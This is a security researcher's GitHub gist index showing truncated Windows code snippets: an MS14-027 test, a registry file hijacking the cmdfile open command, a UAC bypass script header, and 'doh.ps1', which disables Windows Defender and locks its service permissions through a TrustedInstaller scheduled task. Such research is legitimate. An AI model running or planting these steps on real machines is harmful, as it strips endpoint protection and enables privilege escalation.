Skip to content

Instantly share code, notes, and snippets.

James Forshaw tyranid

Block or report user

Report or block tyranid

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View Test for MS14-027
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
int wmain(int argc, WCHAR* argv[])
{
if (argc < 2)
{
printf("Usage: ImpersonateSHExec filename [sessionid]\n");
return 1;
@tyranid
tyranid / cmdfile registration
Created May 22, 2014
A registry file for cmdfile registration
View cmdfile registration
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\cmdfile\shell\open\command]
@="c:\\windows\\system32\\calc.exe"
@tyranid
tyranid / ntfs_testcase.cpp
Created Jun 2, 2014
Test Case for Illegal NTFS Names
View ntfs_testcase.cpp
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <string>
int _tmain(int argc, _TCHAR* argv[])
{
for (int i = 1; i < 128; ++i)
{
std::wstring name = L".\a";
View bypass_uac.ps1
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager
View kill_file_locker.ps1
Import-Module NtObjectManager
<#
Function to kill all processes which are using a locked file.
#>
function Kill-FileLocker {
param(
[Parameter(Mandatory)]
[string]$Path
)
@tyranid
tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
You can’t perform that action at this time.